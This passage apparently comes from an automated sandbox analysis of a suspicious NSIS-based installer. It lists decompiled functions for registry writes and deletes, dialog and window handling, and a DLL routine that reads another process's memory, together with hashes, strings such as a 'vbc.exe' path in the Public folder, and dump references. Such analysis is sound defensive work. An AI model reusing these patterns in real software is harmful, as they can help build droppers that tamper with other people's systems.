              0x004028c1
              0x004028cd

              APIs
              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402374
              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd99E0.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
              • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd99E0.tmp,00000000), ref: 004023CD
              • RegCloseKey.ADVAPI32(?), ref: 004024B0
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseCreateValuelstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp
              • API String ID: 1356686001-852824691
              • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
              • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
              • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
              • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004038E3, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004038E3(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B3E(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ec64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ec30; // 0x504d60
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ec60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e400 = _t18[1];
					 *0x42ecc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e3fc = _t23;
						E00405B25(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "qghopzytl Setup", 0xfffffffe));
						_t11 =  *0x42ec4c; // 0x3
						_t27 =  *0x42ec48; // 0x504f0c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x504f24
								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















              0x004038e7
              0x004038ec
              0x004038f2
              0x004038f7
              0x004038f7
              0x004038ff
              0x00000000
              0x00000000
              0x00403901
              0x00403907
              0x0040390f
              0x00403911
              0x00403917
              0x00403917
              0x00403919
              0x00403925
              0x00000000
              0x00000000
              0x00403929
              0x00000000
              0x00000000
              0x00000000
              0x0040392b
              0x00403930
              0x00403939
              0x0040393f
              0x00403944
              0x00403958
              0x00403963
              0x0040397b
              0x00403981
              0x00403986
              0x0040398e
              0x004039af
              0x004039af
              0x004039af
              0x00403990
              0x00403992
              0x00403992
              0x00403996
              0x00403999
              0x0040399d
              0x0040399d
              0x004039a2
              0x004039a8
              0x004039a8
              0x00000000
              0x00403992
              0x00403946
              0x0040394b
              0x00403954
              0x0040394d
              0x0040394d
              0x0040394d
              0x0040394b

              APIs
              • SetWindowTextA.USER32(00000000,qghopzytl Setup), ref: 0040397B
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: TextWindow
              • String ID: "C:\Users\Public\vbc.exe" $1033$`MP$qghopzytl Setup
              • API String ID: 530164218-3795686686
              • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
              • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
              • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
              • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 73062D80, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON
              Download Yara Rule
              C-Code - Quality: 45%
              			E73062D80(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, long _a20, intOrPtr* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				void* _t24;
				intOrPtr _t28;

				_v12 = E73061480(_a4);
				_v8 = 0;
				_t24 = _a16;
				0x73060000(_a8, _a12, _t24, _a20, _a24);
				0x73060000("%p, %s, %p, %u, %p.\n", _a4, _t24);
				_push(_v12);
				 *0x73068000 = E73061120(_a4);
				if( *0x73068000 != 0) {
					_t28 =  *0x73068000;
					_t39 =  *(_t28 + 8);
					if(ReadProcessMemory( *(_t28 + 8), _a8, _a16, _a20,  &_v16) == 0) {
						_v8 = E73067790(_t39, GetLastError());
						0x73060000("Failed to read process memory %#x.\n", _v8);
					} else {
						if(_a24 != 0) {
							 *_a24 = _v16;
						}
					}
					return _v8;
				}
				return 0x8000ffff;
			}








              0x73062d92
              0x73062d95
              0x73062da4
              0x73062db0
              0x73062dc2
              0x73062dcd
              0x73062dd6
              0x73062de2
              0x73062dfb
              0x73062e00
              0x73062e0c
              0x73062e2d
              0x73062e39
              0x73062e0e
              0x73062e12
              0x73062e1a
              0x73062e1a
              0x73062e1c
              0x00000000
              0x73062e41
              0x00000000

              APIs
              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 73062E04
              Strings
              • Failed to read process memory %#x., xrefs: 73062E34
              • %p, %s, %p, %u, %p., xrefs: 73062DBD
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MemoryProcessRead
              • String ID: %p, %s, %p, %u, %p.$Failed to read process memory %#x.
              • API String ID: 1726664587-1385917401
              • Opcode ID: b3fe2ef1b2da276f82c13a1ae0fa7211d110e300abde72dcaa09949419306a85
              • Instruction ID: 2f83858864f7670308eb6f72c1b29c73eabea7d20ab84b155ae9b0a85a5452d5
              • Opcode Fuzzy Hash: b3fe2ef1b2da276f82c13a1ae0fa7211d110e300abde72dcaa09949419306a85
              • Instruction Fuzzy Hash: 082148F6904609EFDB04DFA4D844F9E77B9AB4C604F108568F909DB249D730DA14CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
              Download Yara Rule
              C-Code - Quality: 84%
              			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ecd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F57(4);
					if(_t27 == 0) {
						__eflags =  *0x42ecd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
				}
				return _t18;
			}










              0x00402a79
              0x00402a8a
              0x00402a92
              0x00402aba
              0x00402aa1
              0x00402aa4
              0x00402af4
              0x00402afa
              0x00402afc
              0x00000000
              0x00402afc
              0x00402ab1
              0x00402ab6
              0x00402ab8
              0x00000000
              0x00000000
              0x00402ab8
              0x00402acf
              0x00402ad7
              0x00402ade
              0x00402b04
              0x00402b0a
              0x00000000
              0x00000000
              0x00402b12
              0x00402b18
              0x00402b1a
              0x00000000
              0x00000000
              0x00000000
              0x00402b1a
              0x00000000
              0x00402aed
              0x00402b01

              APIs
              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
              • RegCloseKey.ADVAPI32(?), ref: 00402ACF
              • RegCloseKey.ADVAPI32(?), ref: 00402AF4
              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Close$DeleteEnumOpen
              • String ID:
              • API String ID: 1912718029-0
              • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
              • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
              • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
              • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







              0x00401ce8
              0x00401cef
              0x00401d1e
              0x00401d26
              0x00401d2d
              0x00401d2d
              0x004028c1
              0x004028cd

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
              • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
              • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
              • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
			}



















              0x0040467e
              0x00404683
              0x0040468b
              0x0040468c
              0x00404699
              0x004046a1
              0x004046a2
              0x004046a4
              0x004046a6
              0x004046a8
              0x004046ab
              0x004046ab
              0x004046b2
              0x004046b8
              0x004046b8
              0x004046bf
              0x004046c6
              0x004046c9
              0x004046cc
              0x004046cc
              0x004046d0
              0x004046e0
              0x004046e2
              0x004046e5
              0x0040468e
              0x0040468e
              0x00404695
              0x00404695
              0x004046ed
              0x004046f8
              0x0040470e
              0x0040471e
              0x0040473a

              APIs
              • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
              • wsprintfA.USER32 ref: 0040471E
              • SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s
              • API String ID: 3540041739-3551169577
              • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
              • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
              • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
              • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 51%
              			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












              0x00401bd3
              0x00401bdf
              0x00401be2
              0x00401beb
              0x00401beb
              0x00401bee
              0x00401bf2
              0x00401bfb
              0x00401bfb
              0x00401bfe
              0x00401c02
              0x00401c04
              0x00401c51
              0x00401c53
              0x00401c5c
              0x00401c64
              0x00401c67
              0x00401c67
              0x00401c70
              0x00000000
              0x00401c06
              0x00401c0d
              0x00401c0f
              0x00401c17
              0x00401c1a
              0x00401c42
              0x00401c76
              0x00401c76
              0x00401c1c
              0x00401c2a
              0x00401c32
              0x00401c35
              0x00401c35
              0x00401c1a
              0x00401c79
              0x00401c7c
              0x00401c82
              0x00402866
              0x00402866
              0x004028c1
              0x004028cd

              APIs
              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
              • SendMessageA.USER32 ref: 00401C42
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
              • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
              • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
              • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004056BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004056BA(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




              0x004056bb
              0x004056d2
              0x004056da
              0x004056da
              0x004056e2

              APIs
              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
              • CharPrevA.USER32(?,00000000), ref: 004056C9
              • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-4017390910
              • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
              • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
              • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
              • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b05b = 1;
				 *0x40b058 = _t11 & 0x00000001;
				 *0x40b059 = _t11 & 0x00000002;
				 *0x40b05a = _t11 & 0x00000004;
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











              0x00401d46
              0x00401d5f
              0x00401d69
              0x00401d6e
              0x00401d79
              0x00401d80
              0x00401d92
              0x00401d98
              0x00401d9d
              0x00401da7
              0x004024eb
              0x00401561
              0x00402866
              0x004028c1
              0x004028cd

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CapsCreateDeviceFontIndirect
              • String ID:
              • API String ID: 3272661963-0
              • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
              • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
              • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
              • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420c48; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ec2c;
						if(_t2 >  *0x42ec2c) {
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);
					}
				} else {
					_t6 =  *0x420c48; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}






              0x00402bf8
              0x00402c12
              0x00402c18
              0x00402c22
              0x00402c28
              0x00402c2e
              0x00402c3f
              0x00402c48
              0x00000000
              0x00402c4d
              0x00402c54
              0x00402c1a
              0x00402c21
              0x00402c21
              0x00402bfa
              0x00402bfa
              0x00402c01
              0x00402c04
              0x00402c04
              0x00402c0a
              0x00402c11
              0x00402c11

              APIs
              • DestroyWindow.USER32 ref: 00402C04
              • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
              • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
              • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$CountCreateDestroyDialogParamShowTick
              • String ID:
              • API String ID: 2102729457-0
              • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
              • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
              • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
              • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404E03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
